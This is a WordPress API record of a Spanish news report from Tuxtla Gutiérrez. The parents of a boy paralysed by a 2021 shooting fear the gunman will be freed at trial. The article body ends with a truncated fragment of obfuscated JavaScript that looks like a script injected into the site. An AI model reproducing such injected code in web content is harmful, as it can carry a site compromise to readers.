{"id":9855,"date":"2023-05-02T02:52:50","date_gmt":"2023-05-02T02:52:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9855"},"modified":"2023-05-02T02:52:51","modified_gmt":"2023-05-02T02:52:51","slug":"familares-de-menor-alcanzado-por-una-bala-piden-que-responsable-no-sea-liberado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9855","title":{"rendered":"Familares de menor alcanzado por una bala, piden que responsable no sea liberado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"538\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682994543576.jpg\" alt=\"\" class=\"wp-image-9856\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682994543576.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682994543576-300x224.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>1 de Mayo del 2023. Tuxtla Guti\u00e9rrez.- Padres del menor Istv\u00e1n, quien fuera agredido por un sujeto a balazos en la v\u00eda p\u00fablica en el a\u00f1o 2021, hacen un llamado a las autoridades en este caso pues temen que quede en libertad.<\/p>\n\n\n\n<p>Istv\u00e1n \u00c1lvarez, padre de la v\u00edctima relataron que han pasado ya dos a\u00f1o y este martes dos de mayo se llevar\u00e1 a cabo la audiencia de juicio oral, en el Penal El Amate donde se encuentra recluido.<\/p>\n\n\n\n<p>El agresor portaba un arma y dos cargadores abastecidos el d\u00eda del ataque, y existe el temor que, en a audiencia puede cambiar la medida cautelar y el responsable quede en libertad.<\/p>\n\n\n\n<p>Recordaron que el agresor es un sujeto desconocido que, de manera repentina sali\u00f3 de una cafeter\u00eda, y sin mediar dispar\u00f3 en contra de los ocupantes de la camioneta donde viajaba Istv\u00e1n de 11 a\u00f1os de edad (en ese entonces).<\/p>\n\n\n\n<p>Los familiares indicaron que, los disparos da\u00f1aron v\u00e9rtebras del menor que, permanece en una silla de ruedas despu\u00e9s de este lamentable hecho.<\/p>\n\n\n\n<p>Los abogados de la familia, detallaron que, al inicio del juicio es que se dicte una sentencia de condena pues este ataque, arruin\u00f3 la vida de un menor con un futuro brillante.<br>En este espacio se dio a conocer que, Istv\u00e1n hab\u00eda sido un destacado pr\u00e1cticamente de Taekwondo y brillante estudiante.<\/p>\n\n\n\n<p>\u201cEs lamentable que, un sujeto que iba armado hasta los dientes dispuesto a matar a alguien ese d\u00eda por cualquier motivo, est\u00e9 libre, es un peligro para todos, por ello es necesario que se haga justicia, es lo que se pide a las autoridades, que tomen conciencia del caso, se trata de una vida, de una familia que ha ca\u00eddo en tragedia por un sujeto identificado y se\u00f1alado como responsable, que se quiere hacer pasar por inocente\u201d, destacaron.<\/p>\n\n\n\n<p>El padre de Istv\u00e1n, hizo hincapi\u00e9 en que, el responsable no podr\u00e1 hacer la reparaci\u00f3n del da\u00f1o, pues el da\u00f1o en la m\u00e9dula espinal es irreversible.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 1 de Mayo del 2023. Tuxtla Guti\u00e9rrez.- Padres del menor Istv\u00e1n, quien fuera agredido por un sujeto a balazos en la v\u00eda p\u00fablica en el a\u00f1o 2021, hacen un llamado a las autoridades en este caso pues temen que quede en libertad. Istv\u00e1n \u00c1lvarez, padre de la v\u00edctima relataron que han pasado ya &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9856,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9855","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9855","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9855"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9855\/revisions"}],"predecessor-version":[{"id":9857,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9855\/revisions\/9857"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9856"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9855"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9855"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9855"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}